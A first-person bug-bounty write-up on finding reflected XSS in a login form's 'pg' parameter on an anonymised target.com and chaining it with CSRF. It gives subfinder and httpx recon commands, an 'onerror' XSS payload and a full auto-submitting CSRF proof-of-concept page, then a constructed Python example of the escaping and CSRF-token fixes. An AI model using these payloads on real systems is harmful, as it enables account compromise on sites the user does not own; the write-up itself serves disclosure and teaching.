Hi, my name is Mohamed Yasser (Spider4).
This is my first bug-hunting write-up. I will explain step by step how I found 3 valid bugs.
My target has a very wide scope; I will call it target.com.
First I used subfinder. You can configure it and add API keys to get more subdomains; if you don't know how, this guide will help you: An in-depth guide to subfinder: beginner to advanced (projectdiscovery.io)
subfinder -d target.com -all > subfinder.txt
Then I checked which hosts were live using httpx:
cat subfinder.txt | httpx > httpx.txt
You can learn more about httpx and its options with -h.
I worked on this target for several days and found almost 4 bugs, but all of them were duplicates.
So I decided to look for things most people don't test. While hunting I found a login function, so I opened Burp and intercepted the request. I noticed that the request carried hidden parameters and that there were no CSRF tokens or any other defense against CSRF attacks.
[image: vulnerable parameter]
So I decided to test for reflection: the username, password, module and pg parameters are all reflected.
After trying special characters, all of them were encoded except the pg parameter, which has no encoding, so XSS will work.
I tried basic payload :
"><img src=1 onerror=alert('Spider4')>
and popup fired :)
Up to this point it is only a self-XSS, so you need to chain it with CSRF to have an impact.
You can build the PoC with any CSRF PoC generator or with Burp Suite Professional:
<html><body>
<form action="https://subdomain.target.com/login" method="POST">
<input type="hidden" name="username" value="test" />
<input type="hidden" name="password" value="test" />
<input type="hidden" name="module" value="login" />
<input type="hidden" name="pg" value="spider&quot;&gt;&lt;img src=x onerror=alert(1)&gt;" /> <!-- payload entity-encoded so it stays inside the value attribute and is submitted as-is -->
<input type="hidden" name="at" value="login" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
The developer's mistake was not a one-off, so you may find more bugs using the same technique.
So what about testing the register page?
After testing it I found the same bug, this time in another parameter called ettevote.
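To show the two fixes that break this chain (escape every reflected value, and require a CSRF token on the login and register POSTs), here is an added example handler. It is not the target's code; the parameter names come from the write-up, everything else is constructed.

```python
import html
import hmac
import secrets

# Hypothetical handler for the login/register flow in the write-up.
# Parameter names (username, password, module, pg) come from the
# request described above; the rest is constructed for this example.
REFLECTED = ("username", "password", "module", "pg")


def render_vulnerable(params):
    """Reproduces the defect: every reflected field is escaped except pg."""
    enc = {k: html.escape(params.get(k, ""), quote=True) for k in REFLECTED}
    enc["pg"] = params.get("pg", "")  # raw reflection into an attribute -> XSS
    return ('<input name="username" value="%(username)s">'
            '<input name="pg" value="%(pg)s">' % enc)


def render_hardened(params):
    """Escape every reflected value, quotes included, before it lands in HTML."""
    enc = {k: html.escape(params.get(k, ""), quote=True) for k in REFLECTED}
    return ('<input name="username" value="%(username)s">'
            '<input name="pg" value="%(pg)s">' % enc)


def issue_csrf_token(session):
    """Mint a per-session synchronizer token; embed it as a hidden form field."""
    session["csrf"] = secrets.token_urlsafe(32)
    return session["csrf"]


def handle_post(session, params):
    """An auto-submitting cross-site form cannot carry a valid token, so it is refused."""
    expected = session.get("csrf")
    supplied = params.get("csrf", "")
    if not expected or not hmac.compare_digest(expected, supplied):
        return 403, "CSRF token missing or invalid"
    return 200, render_hardened(params)
```

Both fixes are needed: encoding alone still leaves the form open to cross-site submission, and a token alone still leaves the reflected XSS for anyone who can get a victim to submit the form legitimately.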